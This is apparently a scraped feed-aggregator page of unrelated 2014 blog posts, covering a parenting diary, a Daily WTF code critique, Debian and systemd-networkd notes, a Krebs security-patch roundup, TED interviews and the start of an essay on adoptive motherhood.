    I was pretty exhausted after yesterday, so getting out of bed this morning took some serious effort. I started the day with a chiropractic adjustment and then got stuck into doing the obligatory "pre-cleaner clean" and preparing for my third Thermomix demonstration.

    The cleaners arrived and I headed off around the corner. My host thought the demo was starting at 10:30am, so I again had a bit of extra time up my sleeve.

    My Group Leader, Maria, came to observe this demo, and I thought she was just going to be incognito, but to my pleasant surprise, she actually helped out with some of the washing up throughout the demo, which made it easier.

    The demo went really well, and I was happy with how it went, and Maria gave me really positive feedback as well, so I was really stoked.

    I got home with enough time to collapse on the couch with a book for half an hour before I biked to Kindergarten to pick up Zoe.

    As we were heading out, I realised I'd left her helmet at home on her scooter. That's what I get for not putting it back on her bike trailer. So I sent her to Megan's house and biked home to pick up the helmet and headed back again. Two runs up Hawthorne Road in the afternoon heat was a good bit of exercise.

    After a brief play at Megan's, we headed home, and I started dinner. For some reason, I was super organised tonight and had dinner on the table nice and early, and everything cleaned up afterwards, so we had plenty of time to go out for a babyccino before bath time and bed time, and I still managed to get Zoe to bed a little early, and I didn't have any cleaning up to do afterwards.

    It's been a good day.

    Worse Than FailureCodeSOD: Line by Line

    In the bowels of a business unit, a director got a great deal on a third party software package. He bought it, without talking to corporate IT, and then was upset when it couldn’t gracefully integrate with any of the corporate IT assets. Eager to throw good money after bad, the director hired his nephew’s consultancy to build an integration tool to make his new toy work.

    A few months later, the users complained about performance, and somehow, fixing this thing became Jeff’s problem. The process was simple enough: slurp enterprise <script src="" type="text/javascript"></script> data out of a text file, and pass the data on to the third-party tool. It didn’t take Jeff long to figure out why it performed poorly:

    Private Sub ProcessFile()
        &apos prepare to do stuff
        Do Until blnLastTime = True
            Set fileReader = fso.OpenTextFile(strFileName)
             If fileReader.AtEndOfStream = True Then
                blnLastTime = True
                strTextLine = fileReader.ReadLine
             End If
            &apos actually do stuff
            Delete_Line (strFileName)
    End Sub
    Private Sub Delete_Line(strFile)
        Set fileReader = fso.OpenTextFile(strFile)
        If fso.FileExists(strFile & "2") Then
            fso.DeleteFile (strFile & "2")
        End If
        Set fileWriter = fso.CreateTextFile(strFile & 2)
        If fileReader.AtEndOfStream = False Then
        End If
        If fileReader.AtEndOfStream = False Then
                strLine = fileReader.ReadAll
                fileWriter.Write (strLine)
        End If
        fso.DeleteFile strFile, True
        fso.CopyFile strFile & "2", strFile, True
        fso.DeleteFile strFile & 2, True
    End Sub

    Start by opening a file “foo.txt”. Read a single line from the file. Send it to the third party app. Close the file. Open “foo.txt” again. Open another file, called “foo.txt2”. Read the first line from “foo.txt”, again. Throw that away. Read the remainder of “foo.txt”, and write it to “foo.txt2”. Copy “foo.txt2” back over “foo.txt”. Now, go back to the top of the loop and read a single line from “foo.txt” again.

    <link href="" rel="stylesheet"/> <script src=""></script> <script>hljs.initHighlightingOnLoad();</script>

    So, for a 10,000 line file, this would perform 30,000 file open operations, write nearly 50 million lines, delete 20,000 files, and perform 10,000 copy operations. It didn’t take Jeff very long to rewrite this to simply read the file, one line at a time. The runtime dropped from a few hours to less than a minute.

    Planet DebianRaphaël Hertzog: Freexian’s second report about Debian Long Term Support

    Like last month, here comes a report about the work of paid contributors to Debian LTS.

    Individual reports

    In September 2014, 3 contributors have been paid for 11h each. Here are their individual reports:

    Evolution of the situation

    Compared to last month, we have gained 5 new sponsors, that’s great. We’re now at almost 25% of a full-time position. But we’re not done yet. We believe that we would need at least twice as many sponsored hours to do a reasonable work with at least the most used packages, and possibly four times as much to be able to cover the full archive.

    We’re now at 39 packages that need an update in Squeeze (+9 compared to last month), and the contributors paid by Freexian did handle 11 during last month (this gives an approximate rate of 3 hours per update, CVE triage included).

    Open questions

    Dear readers, what can we do to convince more companies to join the effort?

    The list of sponsors contains almost exclusively companies from Europe. It’s true that Freexian’s offer is in Euro but the economy is world-wide and it’s common to have international invoices. When Ivan Kohler asked if having an offer in dollar would help convince other companies, we got zero feedback.

    What are the main obstacles that you face when you try to convince your managers to get the company to contribute?

    By the way, we prefer that companies take small sponsorship commitments that they can afford over multiple years over granting lots of money now and then not being able to afford it for another year.

    Thanks to our sponsors

    Let me thank our main sponsors:

    Planet DebianMatthew Palmer: My entry in the "Least Used Software EVAH" competition

    For some reason, I seem to end up writing software for very esoteric use-cases. Today, though, I think I’ve outdone myself: I sat down and wrote a Ruby library to get and set process resource limits – those things that nobody ever thinks about except when they run out of file descriptors.

    I didn’t even have a direct need for it. Recently I was grovelling through the EventMachine codebase, looking at the filehandle limit code, and noticed that the pure-ruby implementation didn’t manipulate filehandle limits. I considered adding it, then realised that there wasn’t a library available to do it. Since I haven’t berked around with FFI for a while, I decided to write rlimit. Now to find the time to write that patch for EventMachine…

    Since I doubt there are many people who have a burning need to manipulate rlimits in Ruby, this gem will no doubt sit quiet and undisturbed in the dark, dusty corners of However, for the three people on earth who find this useful: you’re welcome.


    Rondam RamblingsHarris, Aflek, Dawkins, oh my!

    It's been a busy couple of days for people who like to opine on the evils of Islam and Islamophobia.  Sam Harris and Ben Affleck kicked things off with a segment on Bill Maher's show where they had quite the scuffle over whether or not Harris was justified in his anti-Islamic rhetoric, or whether Affleck was trying to deny the truth in the name of political correctness. Lots and lots and lots of

    Planet DebianJulian Andres Klode: Key transition

    I started transitioning from 1024D to 4096R. The new key is available at:

    and the key server. A very short transition statement is available at:

    and included below (the http version might get extended over time if needed).

    The key consists of one master key and 3 sub keys (signing, encryption, authentication). The sub keys are stored on an OpenPGP v2 Smartcard. That’s really cool, isn’t it?

    Somehow it seems that GnuPG 1.4.18 also works with 4096R keys on this smartcard (I accidentally used it instead of gpg2 and it worked fine), although only GPG 2.0.13 and newer is supposed to work.

    Hash: SHA1,SHA512
    Because 1024D keys are not deemed secure enough anymore, I switched to
    a 4096R one.
    The old key will continue to be valid for some time, but i prefer all
    future correspondence to come to the new one.  I would also like this
    new key to be re-integrated into the web of trust.  This message is
    signed by both keys to certify the transition.
    the old key was:
    pub   1024D/00823EC2 2007-04-12
          Key fingerprint = D9D9 754A 4BBA 2E7D 0A0A  C024 AC2A 5FFE 0082 3EC2
    And the new key is:
    pub   4096R/6B031B00 2014-10-14 [expires: 2017-10-13]
          Key fingerprint = AEE1 C8AA AAF0 B768 4019  C546 021B 361B 6B03 1B00
    Version: GnuPG v2
    -----END PGP SIGNATURE-----

    Filed under: Uncategorized

    Planet DebianJoachim Breitner: Switching to systemd-networkd

    Ever since I read about systemd-networkd being in the making I was looking forward to try it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

    My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interface. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

    $ cat > /etc/systemd/network/ <<__END__
    $ systemctl enable systemd-networkd
    $ systemctl start systemd-networkd

    I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

    But then I was bitten by what I guess some people call the viral nature of systemd: systemd-networkd would not update /etc/resolve.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolve.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolve.conf directly.

    So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

    Description=WPA supplicant daemon (interface-specific version)
    ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I

    Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with


    does the rest.

    So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

    The only thing that I’m missing so far is a way to trigger actions when the network configuration has changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

    TEDMusings of a male granny: This retired schoolteacher spends his free time Skyping with Indian schoolkids

    Kids at TK school gather around as David TK leads them in a clas..

    Kids at a school in India gather around a computer as David Swancott leads a School in the Cloud session.

    David Swancott is a retired biology teacher who lives an hour southeast of Bordeaux, France. He spends his free time bicycling, traveling and, for the past two years, being a “Skype Granny.” Swancott is a part of the “Granny Cloud,” a project created by 2013 TED Prize winner Sugata Mitra to make teachers available online to mentor children participating in his School in the Cloud. As children explore the big questions that matter to them, they get nudges in the right direction from a Skype Granny. But don’t let the name fool you. While many Granny Cloud participants are female and retired, just as many are male or in their 20s, 30s and 40s.

    Now that the school year is underway, the TED Prize Blog checked in with one of our male grannies to ask about his experience mentoring kids through the Granny Cloud.

    You’re retired, living in the countryside. What inspired you to become a Skype Granny for School in the Cloud?

    I found out about it on television—on the BBC’s The One Show, which follows the evening news. They did a segment about the Granny Cloud, and it stirred my interest. I thought, “That’s something I might like to be involved with.” I missed being in contact with children. So I got in touch with the contact provided on the show’s website, downloaded an application form and, after an interview and orientation, I became a Skype Granny. Once a teacher, always a teacher.

    Every Tuesday morning, you Skype with young students at two different schools in India. Can you talk us through a typical session?

    Last week, one group came on and immediately wanted to know about butterflies. So as time was tight, I quickly hunted out a National Geographic video on the monarch butterfly and we watched that. Afterwards, we talked through what they’d seen. I asked questions and together we explored the life cycle of a butterfly.

    Sessions last between 30 and 45 minutes. We usually start by spending some time talking about the things that have happened during the week, then I show them some photos or a video or written material, usually on a topic they decided on the week before. We spend time talking about the material. I try to get them to input as much as possible — picking out new vocabulary, checking spelling and so on.

    You’re the grandfather of two young boys and taught high school in England for more than 40 years, which means you must be very patient. What are some challenges you’ve come across being a Skype Granny?

    Well, you have to think on your feet a bit sometimes and be willing to move with the children if they go off on a tangent. Quite often, there are problems with sound or vision or even both, and we have to resort to communication by text. There’s also no guarantee that the Internet will work at all, as the facilities in some areas are so poor. On one occasion, the line to the school was attacked by monkeys and it took a while for it to be repaired, as the school is in a very remote area.


    Another School in the Cloud session, with kids gathered around a computer.

    What’s the best thing about being a Skype Granny?

    The children’s enthusiasm, their willingness to learn and their appreciation of my involvement as a granny. Recently, I’ve been experiencing some heart problems and when I re-started the sessions after my illness, the children at one of the schools had made these lovely “Get Well Soon” cards for me, which they were able to show to me during one of our sessions. What a tonic that was! And, unlike some of the children in England, when they see you, they smile. They are happy to be there. And they have a contagious enthusiasm, which I think is what keeps me going and makes me want to do more for them.

    What do you think makes a good teacher?

    Teaching is about creating and providing a supportive environment in which a child can learn. A good teacher acts as a facilitator for that child’s learning. The UK government started fiddling around with education, and that’s one of the things that drove me away from teaching – we moved to a very prescribed curriculum with little or no time to drift sideways and explore other facets of a subject or respond to students’ questions or thoughts. The school’s examination results became the most important thing, but it’s much more than that! Overall, I think a good teacher must be able to work within the constraints of the existing system, have an enthusiasm for their subject, and be able to engage students and get them involved with their own learning.

    What do you think is the future of learning?

    The use of technology in schools is changing the way we learn, what we learn, and what the shape of the curriculum should be in the future. I was a teacher during an era when computers first appeared in schools — to be used by teachers, certainly not for students. Now in many schools, the students all have their own computers or tablets. I never envisaged being able to communicate with a school in India on a regular basis, and now look what I am doing! Technology opens up many opportunities for different approaches to learning. Within this, children need to be allowed to take more charge of their learning, with the teacher acting in a more supporting role. Letting go, allowing this to happen, is a big challenge for teachers, as there is security when you are setting out the agenda. But really, this approach doesn’t take anything away from the role of the teacher. We will continue to be instrumental in setting up these learning situations.

    Learn more about becoming a Skype Granny »

    Find out more about Sugata Mitra’s TED Prize wish »

    Krebs on SecurityMicrosoft, Adobe Push Critical Security Fixes

    Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

    brokenwindowsEarlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

    In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks that targeted NATO, Ukrainian and Western government organizations, and firms in the energy sector.

    More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today is available at this link.

    brokenflash-aSeparately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

    Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

    The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

    Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. for Windows, Mac, and Android.

    Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

    If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

    javamessOtherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

    If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

    For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

    Planet DebianJoachim Breitner: Switching to sytemd-networkd

    Ever since I read about sytemd-networkd being in the making I was looking forward to try it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

    My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interface. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

    $ cat > /etc/systemd/network/ <<__END__
    $ systemctl enable systemd-networkd
    $ systemctl start systemd-networkd

    I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

    But then I was bitten by what I guess some people call the viral nature of systemd: sytemd-networkd would not update /etc/resolve.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolve.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolve.conf directly.

    So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

    Description=WPA supplicant daemon (interface-specific version)
    ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I

    Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with


    does the rest.

    So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

    The only thing that I’m missing so far is a way to trigger actions when the network configuration has changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

    Rondam RamblingsParallel universes and the arrow of time

    In a previous post about quantum mechanics and parallel universes I ended with a puzzle: All measurements are in principle reversible. Imagine that we could actually carry out this program of undoing the myriad entanglements that constitute your making a particular observation. What would be the subjective sensation, i.e. what would it "feel like" if this were done to you? If you haven't read

    Planet DebianGunnar Wolf: When Open Access meets the Napster anniversary

    Two causally unrelated events which fit in together in the greater scheme of things ;-)

    In some areas, the world is better aligning to what we have been seeking for many years. In some, of course, it is not.

    In this case, today I found our article on the Network of Digital Repositories for our University, in the Revista Digital Universitaria [en línea] was published. We were invited to prepare an article on this topic because this month's magazine would be devoted to Open Access in Mexico and Latin America — This, because a law was recently passed that makes conditions much more interesting for the nonrestricted publication of academic research. Of course, there is still a long way to go, but this clearly is a step in the right direction.

    On the other hand, after a long time of not looking in that direction (even though it's a lovely magazine), I found that this edition of FirstMonday takes as its main topic Napster, 15 years on: Rethinking digital music distribution.

    I know that nonrestricted academic publishing via open access and nonauthorized music sharing via Napster are two very different topics. However, there is a continuous push and trend towards considering and accepting open licensing terms, and they are both points in the same struggle. An interesting data point to add is that, although many different free licenses have existed over time, Creative Commons (which gave a lot of visibility and made the discussion within the reach of many content creators) was created in 2001 — 13 years ago today, two years after Napster. And, yes, there are no absolute coincidences.

    Geek FeminismAll about my linkspam (14 October 2014)


    A few more links about the Grace Hopper Celebration Ally Panel

    We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet DebianMarco d'Itri: The Italian peering ecosystem

    I published the slides of my talk "An introduction to peering in Italy - Interconnections among the Italian networks" that I presented today at the MIX-IT (the Milano internet exchange) technical meeting.

    TED“National boundaries are not respected by infectious diseases”: A Q&A on the Ebola epidemic at TEDGlobal 2014

    Chikwe Ihekweazu in a fascinating Q&A about the Ebola epidemic at TEDGlobal 2014. Photo: Ryan Lash/TED

    Chikwe Ihekweazu in a fascinating Q&A about the Ebola epidemic at TEDGlobal 2014. Photo: Ryan Lash/TED

    Ten years ago, epidemiologist Chikwe Ihekweazu helped fight an outbreak in South Sudan. This TED Fellow now runs the health consultancy EpiAFRIC, writes about public health issues in his native Nigeria, and is soon to start a four-week rotation on the ground fighting the Ebola epidemic. So as the outbreak continues, he sat down for a Q&A with Chris Anderson in Session 11 to give insights into what is happening and how concerned we all should be.

    The first question: Can we get the scientific overview of what Ebola is and how it makes people sick?

    Ihekweazu gives the disconcerting answer that, unlike some other viruses, we don’t know what the natural host is for Ebola. We do, however, know that in humans it is passed through contact with bodily fluids. We know that the disease has an incubation period of 2 to 21 days and that, unlike many other viruses, you can’t actually transmit the virus unless you are ill. “Most outbreaks are relatively small,” says Ihekweazu. In the South Sudan outbreak he helped fight a decade ago, there were less than 30 cases.

    This time around, things are much worse. As of this moment, there have been close to 8,000 cases and 4,000 deaths. “This is really the worst outbreak we’ve ever dealt with — there’s really been nothing close,” says Ihekweazu. Public health advocates have one main tactic from here: to stop the chain of transmission from one sick person to another. Those most at risk for infection are family members of those already infected, health care workers and people involved in funeral rites.

    The difficulty of fighting the Ebola epidemic in Africa connects to larger currents on the global stage. To illustrate this, Ihekweazu shows us two highly distorted maps of the world. The first illustrates the global deaths from infectious diseases— in this map, Africa and India are severely bloated, while the Americas appear as just a sliver. The next map shows public health spending in the world—here, the United States and Europe appear gigantic, while Africa becomes a thin line. Ihekweazu drops the shocking fact that there is one doctor to every 100,000 people in Liberia. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he says.

    Ihekweazu says that he learned some important lessons in South Sudan that will be helpful this time around. For example, that the stark remoteness of isolation wards is a problem. “If you come to a place like this, it’s likely that you’re going to die there,” says Ihekweazu. “The cycle of anxiety keeps people away and keeps the outbreak spreading, because people stay home and infect their loved ones.” A big challenge now is convincing people to trust local hospitals in which they have “little confidence.”

    But there is a success story: the containment of Ebola in Lagos, Nigeria. When the first case of Ebola cropped up there, it spread to 13 people quickly. But then the spread stopped. An Ebola response center was quickly spun up.

    Thousand of people who’d had contact with patients were contacted and monitored carefully. It worked — there have only been 8 cases since.

    Anderson’s next question for Ihekweazu: At this late stage, can the world get this under control?

    “It can go either way. We could see a plateau in the next few months — which we hope for — or we could see a radical escalation,” says Ihekweazu. “It really depends on what we do in the next few weeks.”

    He feels encouraged as he sees the international community rallying to support the countries most affected by Ebola. “This is a challenge for our common global community — not just a problem for Liberia and Sierra Leone,” he says. “Whether it’s influenza in Mexico, or SARS in Hong Kong, or Ebola in Liberia, the boundaries we hold so dear are not respected by infectious diseases.”

    In Africa especially, governments need to step up. Ihekweazu points out that many hospitals and schools operate without running water, something he says is unacceptable. “How do we mobilize resources to deal with health, education, justice systems, to keep pace with development we’re seeing driven by the private sector across Africa?” he says. “We have a large economy, but it’s all private sector. Our public sector needs to step up.”

    The final question: What can people do to help?

    Ihekweazu stresses two things. First, that people support governments that are giving resources to fight this epidemic. And second, that they give money directly to Médecins Sans Frontières, or Doctors without Borders. “They know what to do — they’ve done it for years,” he says.

    TEDAn animated lesson full of adorable animals made of autumn leaves

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src=";rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    Ten percent of plant matter gets eaten while it is alive. The other 90% falls to the ground and becomes detritus, which supports microbes, insects and, yes, us, as we feed on animals that grazed on it and plants that grow in it.

    When it came time to animate a TED-Ed lesson about this so-called “brown food chain,” the animation team of Celeste Lai, Lisa LaBracio and Biljana Labovic had an idea. LaBracio had a vast collection of dried leaves at home, and the trio conspired to create animals by layering these leaves into a visual representation of the idea that all living things are made up of dead matter.

    “I’ve had a collection of dried leaves and flowers since I was 8 or 9,” says LaBracio, who designed the backgrounds and animated the video. “I hunted for fallen leaves in my backyard and rescued dying bouquets to press between book pages. I’ve always found it fascinating that you can freeze a moment in time this way — and I’m taken with the different colors and patterns that emerge depending on how long a leaf has been on the ground. It’s pretty hard to get anywhere with me during the fall; I’m looking at the ground constantly, stopping every few seconds to grab something.”

    In the lesson above, these leaves become an owl, a fish, a grasshopper, a deer, a lion and a cow in a pasture. Lai, who was the character designer, says that she thoroughly enjoyed the puzzle of creating these animals out of LaBracio’s leaves.







    “The lion was the most fun to design. When I realized I could use pressed sunflower petals as the mane, I was ecstatic. Those shapes fit right into the animal design perfectly,” says Lai. “That magic also happened with the tail. I didn’t have to modify the leaf much — it just fit right in!”

    The hardest animal to create? That fish, says Lai. “It’s one of the simplest designs, but because a fish is shaped a lot like a leaf, finding the perfect one was hard,” she says. “I went through a few different designs with bigger or smaller leaves. But when I found the right leaf it became so simple.”

    For Labovic, who directed the lesson, the surprise was how well things fell into place once they’d picked their medium. “For every lesson, we try to challenge ourselves with something new — whether that be in the design or in the animation process,” she says. “At first, my idea was to use just the textures from the leaves, but when Lisa showed me a few little birds she had crafted from multiple leaves years before, I realized we could use 2-D puppet animation to bring the leaves to life.”

    LaBracio admits that she keeps many collections, some of which do come in handy for TED-Ed animations. “Many of Biljana’s and my collaborations feature things I ‘just have lying around.’ Recently, when we were making a video about honeybees, I remember saying, ‘Aww, man! I just threw out a bag of dead honeybees!’” she says. “Admittedly, my love of stop-motion animation has long justified my collecting. As a child, I loved showing my mom that there was a purpose to my jars of buttons and drawers of fabric scraps. And this project was a gift because it finally motivated me to digitally archive my favorite — and largest — collection.”

     For more unique animations, check out TED-Ed lessons »

    RacialiciousWho’s Your Mama?: Race, Sexuality, and the Adoptive Mother [Academic Essay]

    by Guest Contributor Sara M. Erdmann, MFA, PhD

    The image of the American adoptive mother has emerged gradually since adoption’s inception in 1851, but it has always existed within a racialized and heteronormative context (“Massachusetts Adoption of Children Act, 1851”).

    According to the American adoption narrative, adoptive mothers are white, heterosexual women; their decision to adopt a child is an act of goodwill, and, in cases of transracial adoption, even a badge of racial acceptance.

    This particular adoptive mother has become an accepted, albeit marginalized, part of mothering culture and is the one for whom books are written, organizations formed, and resources developed. This adoptive mother has defined the adoptive mother identity in modern America and become one of many voices within the larger motherhood narrative.

    Yet, research confirms that white, heterosexual women are not the only ones adopting children: many Black and queer (*) non-biological children, but, save for mentions in a few isolated academic texts, their experiences are almost entirely absent from the larger adoption narrative.

    Racism and homophobia are immediately identifiable causes of such exclusion: the powers of prejudice have an incalculable impact on the conversation surrounding non-biological motherhood. Indeed, the somewhat greater presence of Black and queer mothers in the blogosphere reinforces the fact that the elimination of mainstream publishing gatekeepers leads to an increase in diverse stories of motherhood.

    Still, while prejudice has led to innumerable obstacles for these two marginalized groups, it alone does not explain the relative dearth of print and online literature surrounding Black and queer adoptive motherhood. In fact, it is in part due to the history of these two groups and their engagement in non-normative forms of motherhood tha they are less visible and remain largely absent from discussions of modern adoptive motherhood.

    The community othermother has been recognized in African-American communities as an essential player in childrearing since the institution of slavery. In her essay “Mothering: A possible Black feminist link to social transformation?”, social scientist Stanlie M. James defines othermothers as “the women in African-American communities who assist blood mothers in the responsibilities in child care for short to long-term periods, in informal or formal arrangements” (45).

    While othermothers don’t have legal custody of the children they care for, it is impossible to quantify their level of commitment toward the children in their lives. In contrast to the biocentric views of parenthood prioritized in the white, heterosexual community, the informal adoption of non-biological children expands the “network of fictive kin” common within the Black community (James 45).

    Patricia Hill Collins, author of Black Feminist Thought, acknowledges that, while “grandmothers, sisters, aunts, and cousins” are among those who act as othermothers, many othermothers have no blood relationship with the children they care for (178). None of the othermothers Collins describes pursue legal adoption, nor do they intend to be permanent replacements for a child’s birth mother, which makes this “informal adoption” of “needy” or “orphaned” children difficult for western culture to understand (Collins 181). In the Black community, necessity and a shared sense of responsibility has made othermothers central to the raising of children, as they have allowed for children whose mothers were unable or unwilling to care for them fully to be fed, clothed, and educated without having to leave their community or seve ties to their biological mothers.

    This concept of children having more than one mother challenges the “one mother per child”, or monomaternalistic, mentality so rooted in American culture (Park 6). James observes that, “while western conceptualizations of mothering have often been limited to the activities of females with their biological offsprings,” a view that biologically prohibits co-mothering, “mothering within the Afro American community and the Black diaspora can be viewed as a form of cultural work” (44).

    What James describes—this view of mothering as cultural work—explicitly challenges biocentrism and further ensures that a child’s needs are being met within their own community.

    Indeed, Black othermothering is so prevalent that “young women are often groomed at an early age to become othermothers” (Collins), suggesting an expectation that the majority of women will take on some othermothering duties in their lifetime. Thus, the long-standing practice of African American othermothering has led Black women to view even traditional adoption and fostering differently and remains one of the fundamental reasons that Black women are largely absent in modern discussions of adoption.

    In her essay “Ain’t I a Mommy?,” Deesha Philyaw addresses the lack of Black voices in American motherhood narratives. Philyaw acknowledges racism’s substantive role, but also concedes that Black women may not be writing about motherhood in the same numbers in the first place: “If black women haven’t beaten down publishers’ doors with manuscripts about mothering or about pulling second shifts,” she writes, “it’s probably because this is what we’ve always done, without fanfare and without the luxury of ‘what about the children?’ pearl-clutching” (Philyaw).

    In other words, the market for Black motherhood memoirs is small in part because Black women either can’t or won’t buy into the guilt and angst that underlies most motherhood narratives. Simply put, Black women have been multitasking, working and raising their kids (and often other people’s kids as well) for hundreds of years, and they haven’t had the privilege of worrying (or writing) about the long term impact of their every decision.

    This causation can be broadened to include Black adoptive motherhood as well.

    Thorough research makes clear that there is very little concrete data surrounding black adoptive motherhood, so it’s difficult to know how many women’s experiences are being ignored by such a narrow focus, but blogger Adoptive Black Mom, author of an insightful yet rare blog on Black adoptive mothering, admits to feeling dismayed by “how few People of Color I see in adoption promotional media. We’re out here, but I think that the privilege of race frequently marginalizes us out of the adoption narrative” (“Privilege, Adoption, and Melissa Harris-Perry,” par. 17).

    In a community so accustomed to the work of raising one another’s children, the media and literary attention surrounding adoptive motherhood may not resonate in the same way with Black women.

    To write a memoir or create a formal organization geared toward adoptive mothering would suggest that one considers it a novel experience, when the communal act of child raising is so embedded in many African American communities that such formality is mystifying.

    Like Black othermothers, queer othermothers have been vital to childrearing, despite their relative invisibility within the larger adoption narrative. In fact, the history of their crucial but undocumented role has similarly contributed to their absence within the conversation surrounding adoption. In her anthology, Confessions of the Other Mother: Non-Biological Lesbian Moms Tell All, queer journalist Kathy Paige defines othermother as the non-biological co mother who may or may not have legal custody over her child.

